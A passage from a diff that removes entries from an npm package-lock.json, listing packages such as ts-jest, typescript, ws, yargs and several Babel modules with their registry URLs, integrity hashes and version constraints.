"https://registry.npmjs.org/minipass/-/minipass-5.0.0.tgz", - "integrity": "sha512-3FnjYuehv9k6ovOEbyOswadCDPX1piCfhV8ncmYtHOjuPwylVWsghTLo7rabjC3Rx5xD4HDx8Wm1xnMF7S5qFQ==", - "engines": { - "node": ">=8" - } - }, - "node_modules/test-exclude": { - "version": "6.0.0", - "resolved": "https://registry.npmjs.org/test-exclude/-/test-exclude-6.0.0.tgz", - "integrity": "sha512-cAGWPIyOHU6zlmg88jwm7VRyXnMN7iV68OGAbYDk/Mh/xC/pzVPlQtY6ngoIH/5/tciuhGfvESU8GrHrcxD56w==", - "dev": true, - "dependencies": { - "@istanbuljs/schema": "^0.1.2", - "glob": "^7.1.4", - "minimatch": "^3.0.4" - }, - "engines": { - "node": ">=8" - } - }, - "node_modules/tmp": { - "version": "0.2.1", - "resolved": "https://registry.npmjs.org/tmp/-/tmp-0.2.1.tgz", - "integrity": "sha512-76SUhtfqR2Ijn+xllcI5P1oyannHNHByD80W1q447gU3mp9G9PSpGdWmjUOHRDPiHYacIk66W7ubDTuPF3BEtQ==", - "dependencies": { - "rimraf": "^3.0.0" - }, - "engines": { - "node": ">=8.17.0" - } - }, - "node_modules/tmp-promise": { - "version": "3.0.2", - "resolved": "https://registry.npmjs.org/tmp-promise/-/tmp-promise-3.0.2.tgz", - "integrity": "sha512-OyCLAKU1HzBjL6Ev3gxUeraJNlbNingmi8IrHHEsYH8LTmEuhvYfqvhn2F/je+mjf4N58UmZ96OMEy1JanSCpA==", - "dependencies": { - "tmp": "^0.2.0" - } - }, - "node_modules/tmpl": { - "version": "1.0.5", - "resolved": "https://registry.npmjs.org/tmpl/-/tmpl-1.0.5.tgz", - "integrity": "sha512-3f0uOEAQwIqGuWW2MVzYg8fV/QNnc/IpuJNG837rLuczAaLVHslWHZQj4IGiEl5Hs3kkbhwL9Ab7Hrsmuj+Smw==", - "dev": true - }, - "node_modules/to-fast-properties": { - "version": "2.0.0", - "resolved": "https://registry.npmjs.org/to-fast-properties/-/to-fast-properties-2.0.0.tgz", - "integrity": "sha1-3F5pjL0HkmW8c+A3doGk5Og/YW4=", - "dev": true, - "engines": { - "node": ">=4" - } - }, - "node_modules/to-regex-range": { - "version": "5.0.1", - "resolved": "https://registry.npmjs.org/to-regex-range/-/to-regex-range-5.0.1.tgz", - "integrity": "sha512-65P7iz6X5yEr1cwcgvQxbbIw7Uk3gOy5dIdtZ4rDveLqhrdJP+Li/Hx6tyK0NEb+2GCyneCMJiGqrADCSNk8sQ==", - "dev": true, - "dependencies": { - "is-number": "^7.0.0" - }, - "engines": { - "node": ">=8.0" - } - }, - "node_modules/tough-cookie": { - "version": "2.5.0", - "resolved": "https://registry.npmjs.org/tough-cookie/-/tough-cookie-2.5.0.tgz", - "integrity": "sha512-nlLsUzgm1kfLXSXfRZMc1KLAugd4hqJHDTvc2hDIwS3mZAfMEuMbc03SujMF+GEcpaX/qboeycw6iO8JwVv2+g==", - "dependencies": { - "psl": "^1.1.28", - "punycode": "^2.1.1" - }, - "engines": { - "node": ">=0.8" - } - }, - "node_modules/ts-jest": { - "version": "29.0.5", - "resolved": "https://registry.npmjs.org/ts-jest/-/ts-jest-29.0.5.tgz", - "integrity": "sha512-PL3UciSgIpQ7f6XjVOmbi96vmDHUqAyqDr8YxzopDqX3kfgYtX1cuNeBjP+L9sFXi6nzsGGA6R3fP3DDDJyrxA==", - "dev": true, - "dependencies": { - "bs-logger": "0.x", - "fast-json-stable-stringify": "2.x", - "jest-util": "^29.0.0", - "json5": "^2.2.3", - "lodash.memoize": "4.x", - "make-error": "1.x", - "semver": "7.x", - "yargs-parser": "^21.0.1" - }, - "bin": { - "ts-jest": "cli.js" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - }, - "peerDependencies": { - "@babel/core": ">=7.0.0-beta.0 <8", - "@jest/types": "^29.0.0", - "babel-jest": "^29.0.0", - "jest": "^29.0.0", - "typescript": ">=4.3" - }, - "peerDependenciesMeta": { - "@babel/core": { - "optional": true - }, - "@jest/types": { - "optional": true - }, - "babel-jest": { - "optional": true - }, - "esbuild": { - "optional": true - } - } - }, - "node_modules/ts-jest/node_modules/semver": { - "version": "7.5.4", - "resolved": "https://registry.npmjs.org/semver/-/semver-7.5.4.tgz", - "integrity": "sha512-1bCSESV6Pv+i21Hvpxp3Dx+pSD8lIPt8uVjRrxAUt/nbswYc+tK6Y2btiULjd4+fnq15PX+nqQDC7Oft7WkwcA==", - "dev": true, - "dependencies": { - "lru-cache": "^6.0.0" - }, - "bin": { - "semver": "bin/semver.js" - }, - "engines": { - "node": ">=10" - } - }, - "node_modules/tslib": { - "version": "2.5.0", - "resolved": "https://registry.npmjs.org/tslib/-/tslib-2.5.0.tgz", - "integrity": "sha512-336iVw3rtn2BUK7ORdIAHTyxHGRIHVReokCR3XjbckJMK7ms8FysBfhLR8IXnAgy7T0PTPNBWKiH514FOW/WSg==" - }, - "node_modules/tunnel-agent": { - "version": "0.6.0", - "resolved": "https://registry.npmjs.org/tunnel-agent/-/tunnel-agent-0.6.0.tgz", - "integrity": "sha1-J6XeoGs2sEoKmWZ3SykIaPD8QP0=", - "dependencies": { - "safe-buffer": "^5.0.1" - }, - "engines": { - "node": "*" - } - }, - "node_modules/tweetnacl": { - "version": "0.14.5", - "resolved": "https://registry.npmjs.org/tweetnacl/-/tweetnacl-0.14.5.tgz", - "integrity": "sha1-WuaBd/GS1EViadEIr6k/+HQ/T2Q=" - }, - "node_modules/type-detect": { - "version": "4.0.8", - "resolved": "https://registry.npmjs.org/type-detect/-/type-detect-4.0.8.tgz", - "integrity": "sha512-0fr/mIH1dlO+x7TlcMy+bIDqKPsw/70tVyeHW787goQjhmqaZe10uwLujubK9q9Lg6Fiho1KUKDYz0Z7k7g5/g==", - "dev": true, - "engines": { - "node": ">=4" - } - }, - "node_modules/type-fest": { - "version": "0.21.3", - "resolved": "https://registry.npmjs.org/type-fest/-/type-fest-0.21.3.tgz", - "integrity": "sha512-t0rzBq87m3fVcduHDUFhKmyyX+9eo6WQjZvf51Ea/M0Q7+T374Jp1aUiyUl0GKxp8M/OETVHSDvmkyPgvX+X2w==", - "dev": true, - "engines": { - "node": ">=10" - }, - "funding": { - "url": "https://github.com/sponsors/sindresorhus" - } - }, - "node_modules/typescript": { - "version": "4.3.5", - "resolved": "https://registry.npmjs.org/typescript/-/typescript-4.3.5.tgz", - "integrity": "sha512-DqQgihaQ9cUrskJo9kIyW/+g0Vxsk8cDtZ52a3NGh0YNTfpUSArXSohyUGnvbPazEPLu398C0UxmKSOrPumUzA==", - "dev": true, - "bin": { - "tsc": "bin/tsc", - "tsserver": "bin/tsserver" - }, - "engines": { - "node": ">=4.2.0" - } - }, - "node_modules/underscore": { - "version": "1.13.6", - "resolved": "https://registry.npmjs.org/underscore/-/underscore-1.13.6.tgz", - "integrity": "sha512-+A5Sja4HP1M08MaXya7p5LvjuM7K6q/2EaC0+iovj/wOcMsTzMvDFbasi/oSapiwOlt252IqsKqPjCl7huKS0A==" - }, - "node_modules/uri-js": { - "version": "4.4.1", - "resolved": "https://registry.npmjs.org/uri-js/-/uri-js-4.4.1.tgz", - "integrity": "sha512-7rKUyy33Q1yc98pQ1DAmLtwX109F7TIfWlW1Ydo8Wl1ii1SeHieeh0HHfPeL2fMXK6z0s8ecKs9frCuLJvndBg==", - "dependencies": { - "punycode": "^2.1.0" - } - }, - "node_modules/uuid": { - "version": "3.4.0", - "resolved": "https://registry.npmjs.org/uuid/-/uuid-3.4.0.tgz", - "integrity": "sha512-HjSDRw6gZE5JMggctHBcjVak08+KEVhSIiDzFnT9S9aegmp85S/bReBVTb4QTFaRNptJ9kuYaNhnbNEOkbKb/A==", - "deprecated": "Please upgrade to version 7 or higher. Older versions may use Math.random() in certain circumstances, which is known to be problematic. See https://v8.dev/blog/math-random for details.", - "bin": { - "uuid": "bin/uuid" - } - }, - "node_modules/v8-to-istanbul": { - "version": "9.0.1", - "resolved": "https://registry.npmjs.org/v8-to-istanbul/-/v8-to-istanbul-9.0.1.tgz", - "integrity": "sha512-74Y4LqY74kLE6IFyIjPtkSTWzUZmj8tdHT9Ii/26dvQ6K9Dl2NbEfj0XgU2sHCtKgt5VupqhlO/5aWuqS+IY1w==", - "dev": true, - "dependencies": { - "@jridgewell/trace-mapping": "^0.3.12", - "@types/istanbul-lib-coverage": "^2.0.1", - "convert-source-map": "^1.6.0" - }, - "engines": { - "node": ">=10.12.0" - } - }, - "node_modules/verror": { - "version": "1.10.0", - "resolved": "https://registry.npmjs.org/verror/-/verror-1.10.0.tgz", - "integrity": "sha1-OhBcoXBTr1XW4nDB+CiGguGNpAA=", - "engines": [ - "node >=0.6.0" - ], - "dependencies": { - "assert-plus": "^1.0.0", - "core-util-is": "1.0.2", - "extsprintf": "^1.2.0" - } - }, - "node_modules/walker": { - "version": "1.0.8", - "resolved": "https://registry.npmjs.org/walker/-/walker-1.0.8.tgz", - "integrity": "sha512-ts/8E8l5b7kY0vlWLewOkDXMmPdLcVV4GmOQLyxuSswIJsweeFZtAsMF7k1Nszz+TYBQrlYRmzOnr398y1JemQ==", - "dev": true, - "dependencies": { - "makeerror": "1.0.12" - } - }, - "node_modules/which": { - "version": "2.0.2", - "resolved": "https://registry.npmjs.org/which/-/which-2.0.2.tgz", - "integrity": "sha512-BLI3Tl1TW3Pvl70l3yq3Y64i+awpwXqsGBYWkkqMtnbXgrMD+yj7rhW0kuEDxzJaYXGjEW5ogapKNMEKNMjibA==", - "dev": true, - "dependencies": { - "isexe": "^2.0.0" - }, - "bin": { - "node-which": "bin/node-which" - }, - "engines": { - "node": ">= 8" - } - }, - "node_modules/wrap-ansi": { - "version": "7.0.0", - "resolved": "https://registry.npmjs.org/wrap-ansi/-/wrap-ansi-7.0.0.tgz", - "integrity": "sha512-YVGIj2kamLSTxw6NsZjoBxfSwsn0ycdesmc4p+Q21c5zPuZ1pl+NfxVdxPtdHvmNVOQ6XSYG4AUtyt/Fi7D16Q==", - "dev": true, - "dependencies": { - "ansi-styles": "^4.0.0", - "string-width": "^4.1.0", - "strip-ansi": "^6.0.0" - }, - "engines": { - "node": ">=10" - }, - "funding": { - "url": "https://github.com/chalk/wrap-ansi?sponsor=1" - } - }, - "node_modules/wrappy": { - "version": "1.0.2", - "resolved": "https://registry.npmjs.org/wrappy/-/wrappy-1.0.2.tgz", - "integrity": "sha1-tSQ9jz7BqjXxNkYFvA0QNuMKtp8=" - }, - "node_modules/ws": { - "version": "8.12.0", - "resolved": "https://registry.npmjs.org/ws/-/ws-8.12.0.tgz", - "integrity": "sha512-kU62emKIdKVeEIOIKVegvqpXMSTAMLJozpHZaJNDYqBjzlSYXQGviYwN1osDLJ9av68qHd4a2oSjd7yD4pacig==", - "engines": { - "node": ">=10.0.0" - }, - "peerDependencies": { - "bufferutil": "^4.0.1", - "utf-8-validate": ">=5.0.2" - }, - "peerDependenciesMeta": { - "bufferutil": { - "optional": true - }, - "utf-8-validate": { - "optional": true - } - } - }, - "node_modules/y18n": { - "version": "5.0.8", - "resolved": "https://registry.npmjs.org/y18n/-/y18n-5.0.8.tgz", - "integrity": "sha512-0pfFzegeDWJHJIAmTLRP2DwHjdF5s7jo9tuztdQxAhINCdvS+3nGINqPd00AphqJR/0LhANUS6/+7SCb98YOfA==", - "dev": true, - "engines": { - "node": ">=10" - } - }, - "node_modules/yallist": { - "version": "4.0.0", - "resolved": "https://registry.npmjs.org/yallist/-/yallist-4.0.0.tgz", - "integrity": "sha512-3wdGidZyq5PB084XLES5TpOSRA3wjXAlIWMhum2kRcv/41Sn2emQ0dycQW4uZXLejwKvg6EsvbdlVL+FYEct7A==" - }, - "node_modules/yargs": { - "version": "17.6.2", - "resolved": "https://registry.npmjs.org/yargs/-/yargs-17.6.2.tgz", - "integrity": "sha512-1/9UrdHjDZc0eOU0HxOHoS78C69UD3JRMvzlJ7S79S2nTaWRA/whGCTV8o9e/N/1Va9YIV7Q4sOxD8VV4pCWOw==", - "dev": true, - "dependencies": { - "cliui": "^8.0.1", - "escalade": "^3.1.1", - "get-caller-file": "^2.0.5", - "require-directory": "^2.1.1", - "string-width": "^4.2.3", - "y18n": "^5.0.5", - "yargs-parser": "^21.1.1" - }, - "engines": { - "node": ">=12" - } - }, - "node_modules/yargs-parser": { - "version": "21.1.1", - "resolved": "https://registry.npmjs.org/yargs-parser/-/yargs-parser-21.1.1.tgz", - "integrity": "sha512-tVpsJW7DdjecAiFpbIB1e3qxIQsE6NoPc5/eTdrbbIC4h0LVsWhnoa3g+m2HclBIujHzsxZ4VJVA+GUuc2/LBw==", - "dev": true, - "engines": { - "node": ">=12" - } - }, - "node_modules/yocto-queue": { - "version": "0.1.0", - "resolved": "https://registry.npmjs.org/yocto-queue/-/yocto-queue-0.1.0.tgz", - "integrity": "sha512-rVksvsnNCdJ/ohGc6xgPwyN8eheCxsiLM8mxuE/t/mOVqJewPuO1miLpTHQiRgTKCLexL4MeAFVagts7HmNZ2Q==", - "dev": true, - "engines": { - "node": ">=10" - }, - "funding": { - "url": "https://github.com/sponsors/sindresorhus" - } - } - }, - "dependencies": { - "@babel/code-frame": { - "version": "7.22.13", - "resolved": "https://registry.npmjs.org/@babel/code-frame/-/code-frame-7.22.13.tgz", - "integrity": "sha512-XktuhWlJ5g+3TJXc5upd9Ks1HutSArik6jf2eAjYFyIOf4ej3RN+184cZbzDvbPnuTJIUhPKKJE3cIsYTiAT3w==", - "dev": true, - "requires": { - "@babel/highlight": "^7.22.13", - "chalk": "^2.4.2" - }, - "dependencies": { - "ansi-styles": { - "version": "3.2.1", - "resolved": "https://registry.npmjs.org/ansi-styles/-/ansi-styles-3.2.1.tgz", - "integrity": "sha512-VT0ZI6kZRdTh8YyJw3SMbYm/u+NqfsAxEpWO0Pf9sq8/e94WxxOpPKx9FR1FlyCtOVDNOQ+8ntlqFxiRc+r5qA==", - "dev": true, - "requires": { - "color-convert": "^1.9.0" - } - }, - "chalk": { - "version": "2.4.2", - "resolved": "https://registry.npmjs.org/chalk/-/chalk-2.4.2.tgz", - "integrity": "sha512-Mti+f9lpJNcwF4tWV8/OrTTtF1gZi+f8FqlyAdouralcFWFQWF2+NgCHShjkCb+IFBLq9buZwE1xckQU4peSuQ==", - "dev": true, - "requires": { - "ansi-styles": "^3.2.1", - "escape-string-regexp": "^1.0.5", - "supports-color": "^5.3.0" - } - }, - "color-convert": { - "version": "1.9.3", - "resolved": "https://registry.npmjs.org/color-convert/-/color-convert-1.9.3.tgz", - "integrity": "sha512-QfAUtd+vFdAtFQcC8CCyYt1fYWxSqAiK2cSD6zDB8N3cpsEBAvRxp9zOGg6G/SHHJYAT88/az/IuDGALsNVbGg==", - "dev": true, - "requires": { - "color-name": "1.1.3" - } - }, - "color-name": { - "version": "1.1.3", - "resolved": "https://registry.npmjs.org/color-name/-/color-name-1.1.3.tgz", - "integrity": "sha512-72fSenhMw2HZMTVHeCA9KCmpEIbzWiQsjN+BHcBbS9vr1mtt+vJjPdksIBNUmKAW8TFUDPJK5SUU3QhE9NEXDw==", - "dev": true - }, - "escape-string-regexp": { - "version": "1.0.5", - "resolved": "https://registry.npmjs.org/escape-string-regexp/-/escape-string-regexp-1.0.5.tgz", - "integrity": "sha512-vbRorB5FUQWvla16U8R/qgaFIya2qGzwDrNmCZuYKrbdSUMG6I1ZCGQRefkRVhuOkIGVne7BQ35DSfo1qvJqFg==", - "dev": true - }, - "has-flag": { - "version": "3.0.0", - "resolved": "https://registry.npmjs.org/has-flag/-/has-flag-3.0.0.tgz", - "integrity": "sha512-sKJf1+ceQBr4SMkvQnBDNDtf4TXpVhVGateu0t918bl30FnbE2m4vNLX+VWe/dpjlb+HugGYzW7uQXH98HPEYw==", - "dev": true - }, - "supports-color": { - "version": "5.5.0", - "resolved": "https://registry.npmjs.org/supports-color/-/supports-color-5.5.0.tgz", - "integrity": "sha512-QjVjwdXIt408MIiAqCX4oUKsgU2EqAGzs2Ppkm4aQYbjm+ZEWEcW4SfFNTr4uMNZma0ey4f5lgLrkB0aX0QMow==", - "dev": true, - "requires": { - "has-flag": "^3.0.0" - } - } - } - }, - "@babel/compat-data": { - "version": "7.15.0", - "resolved": "https://registry.npmjs.org/@babel/compat-data/-/compat-data-7.15.0.tgz", - "integrity": "sha512-0NqAC1IJE0S0+lL1SWFMxMkz1pKCNCjI4tr2Zx4LJSXxCLAdr6KyArnY+sno5m3yH9g737ygOyPABDsnXkpxiA==", - "dev": true - }, - "@babel/core": { - "version": "7.15.0", - "resolved": "https://registry.npmjs.org/@babel/core/-/core-7.15.0.tgz", - "integrity": "sha512-tXtmTminrze5HEUPn/a0JtOzzfp0nk+UEXQ/tqIJo3WDGypl/2OFQEMll/zSFU8f/lfmfLXvTaORHF3cfXIQMw==", - "dev": true, - "requires": { - "@babel/code-frame": "^7.14.5", - "@babel/generator": "^7.15.0", - "@babel/helper-compilation-targets": "^7.15.0", - "@babel/helper-module-transforms": "^7.15.0", - "@babel/helpers": "^7.14.8", - "@babel/parser": "^7.15.0", - "@babel/template": "^7.14.5", - "@babel/traverse": "^7.15.0", - "@babel/types": "^7.15.0", - "convert-source-map": "^1.7.0", - "debug": "^4.1.0", - "gensync": "^1.0.0-beta.2", - "json5": "^2.1.2", - "semver": "^6.3.0", - "source-map": "^0.5.0" - }, - "dependencies": { - "source-map": { - "version": "0.5.7", - "resolved": "https://registry.npmjs.org/source-map/-/source-map-0.5.7.tgz", - "integrity": "sha1-igOdLRAh0i0eoUyA2OpGi6LvP8w=", - "dev": true - } - } - }, - "@babel/generator": { - "version": "7.23.0", - "resolved": "https://registry.npmjs.org/@babel/generator/-/generator-7.23.0.tgz", - "integrity": "sha512-lN85QRR+5IbYrMWM6Y4pE/noaQtg4pNiqeNGX60eqOfo6gtEj6uw/JagelB8vVztSd7R6M5n1+PQkDbHbBRU4g==", - "dev": true, - "requires": { - "@babel/types": "^7.23.0", - "@jridgewell/gen-mapping": "^0.3.2", - "@jridgewell/trace-mapping": "^0.3.17", - "jsesc": "^2.5.1" - } - }, - "@babel/helper-compilation-targets": { - "version": "7.15.0", - "resolved": "https://registry.npmjs.org/@babel/helper-compilation-targets/-/helper-compilation-targets-7.15.0.tgz", - "integrity": "sha512-h+/9t0ncd4jfZ8wsdAsoIxSa61qhBYlycXiHWqJaQBCXAhDCMbPRSMTGnZIkkmt1u4ag+UQmuqcILwqKzZ4N2A==", - "dev": true, - "requires": { - "@babel/compat-data": "^7.15.0", - "@babel/helper-validator-option": "^7.14.5", - "browserslist": "^4.16.6", - "semver": "^6.3.0" - } - }, - "@babel/helper-environment-visitor": { - "version": "7.22.20", - "resolved": "https://registry.npmjs.org/@babel/helper-environment-visitor/-/helper-environment-visitor-7.22.20.tgz", - "integrity": "sha512-zfedSIzFhat/gFhWfHtgWvlec0nqB9YEIVrpuwjruLlXfUSnA8cJB0miHKwqDnQ7d32aKo2xt88/xZptwxbfhA==", - "dev": true - }, - "@babel/helper-function-name": { - "version": "7.23.0", - "resolved": "https://registry.npmjs.org/@babel/helper-function-name/-/helper-function-name-7.23.0.tgz", - "integrity": "sha512-OErEqsrxjZTJciZ4Oo+eoZqeW9UIiOcuYKRJA4ZAgV9myA+pOXhhmpfNCKjEH/auVfEYVFJ6y1Tc4r0eIApqiw==", - "dev": true, - "requires": { - "@babel/template": "^7.22.15", - "@babel/types": "^7.23.0" - } - }, - "@babel/helper-hoist-variables": { - "version": "7.22.5", - "resolved": "https://registry.npmjs.org/@babel/helper-hoist-variables/-/helper-hoist-variables-7.22.5.tgz", - "integrity": "sha512-wGjk9QZVzvknA6yKIUURb8zY3grXCcOZt+/7Wcy8O2uctxhplmUPkOdlgoNhmdVee2c92JXbf1xpMtVNbfoxRw==", - "dev": true, - "requires": { - "@babel/types": "^7.22.5" - } - }, - "@babel/helper-member-expression-to-functions": { - "version": "7.15.0", - "resolved": "https://registry.npmjs.org/@babel/helper-member-expression-to-functions/-/helper-member-expression-to-functions-7.15.0.tgz", - "integrity": "sha512-Jq8H8U2kYiafuj2xMTPQwkTBnEEdGKpT35lJEQsRRjnG0LW3neucsaMWLgKcwu3OHKNeYugfw+Z20BXBSEs2Lg==", - "dev": true, - "requires": { - "@babel/types": "^7.15.0" - } - }, - "@babel/helper-module-imports": { - "version": "7.14.5", - "resolved": "https://registry.npmjs.org/@babel/helper-module-imports/-/helper-module-imports-7.14.5.tgz", - "integrity": "sha512-SwrNHu5QWS84XlHwGYPDtCxcA0hrSlL2yhWYLgeOc0w7ccOl2qv4s/nARI0aYZW+bSwAL5CukeXA47B/1NKcnQ==", - "dev": true, - "requires": { - "@babel/types": "^7.14.5" - } - }, - "@babel/helper-module-transforms": { - "version": "7.15.0", - "resolved": "https://registry.npmjs.org/@babel/helper-module-transforms/-/helper-module-transforms-7.15.0.tgz", - "integrity": "sha512-RkGiW5Rer7fpXv9m1B3iHIFDZdItnO2/BLfWVW/9q7+KqQSDY5kUfQEbzdXM1MVhJGcugKV7kRrNVzNxmk7NBg==", - "dev": true, - "requires": { - "@babel/helper-module-imports": "^7.14.5", - "@babel/helper-replace-supers": "^7.15.0", - "@babel/helper-simple-access": "^7.14.8", - "@babel/helper-split-export-declaration": "^7.14.5", - "@babel/helper-validator-identifier": "^7.14.9", - "@babel/template": "^7.14.5", - "@babel/traverse": "^7.15.0", - "@babel/types": "^7.15.0" - } - }, - "@babel/helper-optimise-call-expression": { - "version": "7.14.5", - "resolved": "https://registry.npmjs.org/@babel/helper-optimise-call-expression/-/helper-optimise-call-expression-7.14.5.tgz", - "integrity": "sha512-IqiLIrODUOdnPU9/F8ib1Fx2ohlgDhxnIDU7OEVi+kAbEZcyiF7BLU8W6PfvPi9LzztjS7kcbzbmL7oG8kD6VA==", - "dev": true, - "requires": { - "@babel/types": "^7.14.5" - } - }, - "@babel/helper-plugin-utils": { - "version": "7.20.2", - "resolved": "https://registry.npmjs.org/@babel/helper-plugin-utils/-/helper-plugin-utils-7.20.2.tgz", - "integrity": "sha512-8RvlJG2mj4huQ4pZ+rU9lqKi9ZKiRmuvGuM2HlWmkmgOhbs6zEAw6IEiJ5cQqGbDzGZOhwuOQNtZMi/ENLjZoQ==", - "dev": true - }, - "@babel/helper-replace-supers": { - "version": "7.15.0", - "resolved": "https://registry.npmjs.org/@babel/helper-replace-supers/-/helper-replace-supers-7.15.0.tgz", - "integrity": "sha512-6O+eWrhx+HEra/uJnifCwhwMd6Bp5+ZfZeJwbqUTuqkhIT6YcRhiZCOOFChRypOIe0cV46kFrRBlm+t5vHCEaA==", - "dev": true, - "requires": { - "@babel/helper-member-expression-to-functions": "^7.15.0", - "@babel/helper-optimise-call-expression": "^7.14.5", - "@babel/traverse": "^7.15.0", - "@babel/types": "^7.15.0" - } - }, - "@babel/helper-simple-access": { - "version": "7.14.8", - "resolved": "https://registry.npmjs.org/@babel/helper-simple-access/-/helper-simple-access-7.14.8.tgz", - "integrity": "sha512-TrFN4RHh9gnWEU+s7JloIho2T76GPwRHhdzOWLqTrMnlas8T9O7ec+oEDNsRXndOmru9ymH9DFrEOxpzPoSbdg==", - "dev": true, - "requires": { - "@babel/types": "^7.14.8" - } - }, - "@babel/helper-split-export-declaration": { - "version": "7.22.6", - "resolved": "https://registry.npmjs.org/@babel/helper-split-export-declaration/-/helper-split-export-declaration-7.22.6.tgz", - "integrity": "sha512-AsUnxuLhRYsisFiaJwvp1QF+I3KjD5FOxut14q/GzovUe6orHLesW2C7d754kRm53h5gqrz6sFl6sxc4BVtE/g==", - "dev": true, - "requires": { - "@babel/types": "^7.22.5" - } - }, - "@babel/helper-string-parser": { - "version": "7.22.5", - "resolved": "https://registry.npmjs.org/@babel/helper-string-parser/-/helper-string-parser-7.22.5.tgz", - "integrity": "sha512-mM4COjgZox8U+JcXQwPijIZLElkgEpO5rsERVDJTc2qfCDfERyob6k5WegS14SX18IIjv+XD+GrqNumY5JRCDw==", - "dev": true - }, - "@babel/helper-validator-identifier": { - "version": "7.22.20", - "resolved": "https://registry.npmjs.org/@babel/helper-validator-identifier/-/helper-validator-identifier-7.22.20.tgz", - "integrity": "sha512-Y4OZ+ytlatR8AI+8KZfKuL5urKp7qey08ha31L8b3BwewJAoJamTzyvxPR/5D+KkdJCGPq/+8TukHBlY10FX9A==", - "dev": true - }, - "@babel/helper-validator-option": { - "version": "7.14.5", - "resolved": "https://registry.npmjs.org/@babel/helper-validator-option/-/helper-validator-option-7.14.5.tgz", - "integrity": "sha512-OX8D5eeX4XwcroVW45NMvoYaIuFI+GQpA2a8Gi+X/U/cDUIRsV37qQfF905F0htTRCREQIB4KqPeaveRJUl3Ow==", - "dev": true - }, - "@babel/helpers": { - "version": "7.15.3", - "resolved": "https://registry.npmjs.org/@babel/helpers/-/helpers-7.15.3.tgz", - "integrity": "sha512-HwJiz52XaS96lX+28Tnbu31VeFSQJGOeKHJeaEPQlTl7PnlhFElWPj8tUXtqFIzeN86XxXoBr+WFAyK2PPVz6g==", - "dev": true, - "requires": { - "@babel/template": "^7.14.5", - "@babel/traverse": "^7.15.0", - "@babel/types": "^7.15.0" - } - }, - "@babel/highlight": { - "version": "7.22.20", - "resolved": "https://registry.npmjs.org/@babel/highlight/-/highlight-7.22.20.tgz", - "integrity": "sha512-dkdMCN3py0+ksCgYmGG8jKeGA/8Tk+gJwSYYlFGxG5lmhfKNoAy004YpLxpS1W2J8m/EK2Ew+yOs9pVRwO89mg==", - "dev": true, - "requires": { - "@babel/helper-validator-identifier": "^7.22.20", - "chalk": "^2.4.2", - "js-tokens": "^4.0.0" - }, - "dependencies": { - "ansi-styles": { - "version": "3.2.1", - "resolved": "https://registry.npmjs.org/ansi-styles/-/ansi-styles-3.2.1.tgz", - "integrity": "sha512-VT0ZI6kZRdTh8YyJw3SMbYm/u+NqfsAxEpWO0Pf9sq8/e94WxxOpPKx9FR1FlyCtOVDNOQ+8ntlqFxiRc+r5qA==", - "dev": true, - "requires": { - "color-convert": "^1.9.0" - } - }, - "chalk": { - "version": "2.4.2", - "resolved": "https://registry.npmjs.org/chalk/-/chalk-2.4.2.tgz", - "integrity": "sha512-Mti+f9lpJNcwF4tWV8/OrTTtF1gZi+f8FqlyAdouralcFWFQWF2+NgCHShjkCb+IFBLq9buZwE1xckQU4peSuQ==", - "dev": true, - "requires": { - "ansi-styles": "^3.2.1", - "escape-string-regexp": "^1.0.5", - "supports-color": "^5.3.0" - } - }, - "color-convert": { - "version": "1.9.3", - "resolved": "https://registry.npmjs.org/color-convert/-/color-convert-1.9.3.tgz", - "integrity": "sha512-QfAUtd+vFdAtFQcC8CCyYt1fYWxSqAiK2cSD6zDB8N3cpsEBAvRxp9zOGg6G/SHHJYAT88/az/IuDGALsNVbGg==", - "dev": true, - "requires": { - "color-name": "1.1.3" - } - }, - "color-name": { - "version": "1.1.3", - "resolved": "https://registry.npmjs.org/color-name/-/color-name-1.1.3.tgz", - "integrity": "sha512-72fSenhMw2HZMTVHeCA9KCmpEIbzWiQsjN+BHcBbS9vr1mtt+vJjPdksIBNUmKAW8TFUDPJK5SUU3QhE9NEXDw==", - "dev": true - }, - "escape-string-regexp": { - "version": "1.0.5", - "resolved": "https://registry.npmjs.org/escape-string-regexp/-/escape-string-regexp-1.0.5.tgz", - "integrity": "sha512-vbRorB5FUQWvla16U8R/qgaFIya2qGzwDrNmCZuYKrbdSUMG6I1ZCGQRefkRVhuOkIGVne7BQ35DSfo1qvJqFg==", - "dev": true - }, - "has-flag": { - "version": "3.0.0", - "resolved": "https://registry.npmjs.org/has-flag/-/has-flag-3.0.0.tgz", - "integrity": "sha512-sKJf1+ceQBr4SMkvQnBDNDtf4TXpVhVGateu0t918bl30FnbE2m4vNLX+VWe/dpjlb+HugGYzW7uQXH98HPEYw==", - "dev": true - }, - "supports-color": { - "version": "5.5.0", - "resolved": "https://registry.npmjs.org/supports-color/-/supports-color-5.5.0.tgz", - "integrity": "sha512-QjVjwdXIt408MIiAqCX4oUKsgU2EqAGzs2Ppkm4aQYbjm+ZEWEcW4SfFNTr4uMNZma0ey4f5lgLrkB0aX0QMow==", - "dev": true, - "requires": { - "has-flag": "^3.0.0" - } - } - } - }, - "@babel/parser": { - "version": "7.23.0", - "resolved": "https://registry.npmjs.org/@babel/parser/-/parser-7.23.0.tgz", - "integrity": "sha512-vvPKKdMemU85V9WE/l5wZEmImpCtLqbnTvqDS2U1fJ96KrxoW7KrXhNsNCblQlg8Ck4b85yxdTyelsMUgFUXiw==", - "dev": true - }, - "@babel/plugin-syntax-async-generators": { - "version": "7.8.4", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-async-generators/-/plugin-syntax-async-generators-7.8.4.tgz", - "integrity": "sha512-tycmZxkGfZaxhMRbXlPXuVFpdWlXpir2W4AMhSJgRKzk/eDlIXOhb2LHWoLpDF7TEHylV5zNhykX6KAgHJmTNw==", - "dev": true, - "requires": { - "@babel/helper-plugin-utils": "^7.8.0" - } - }, - "@babel/plugin-syntax-bigint": { - "version": "7.8.3", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-bigint/-/plugin-syntax-bigint-7.8.3.tgz", - "integrity": "sha512-wnTnFlG+YxQm3vDxpGE57Pj0srRU4sHE/mDkt1qv2YJJSeUAec2ma4WLUnUPeKjyrfntVwe/N6dCXpU+zL3Npg==", - "dev": true, - "requires": { - "@babel/helper-plugin-utils": "^7.8.0" - } - }, - "@babel/plugin-syntax-class-properties": { - "version": "7.12.13", - "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-class-properties/-/plugin-syntax-class-properties-7.12.13.tgz", - "integrity": 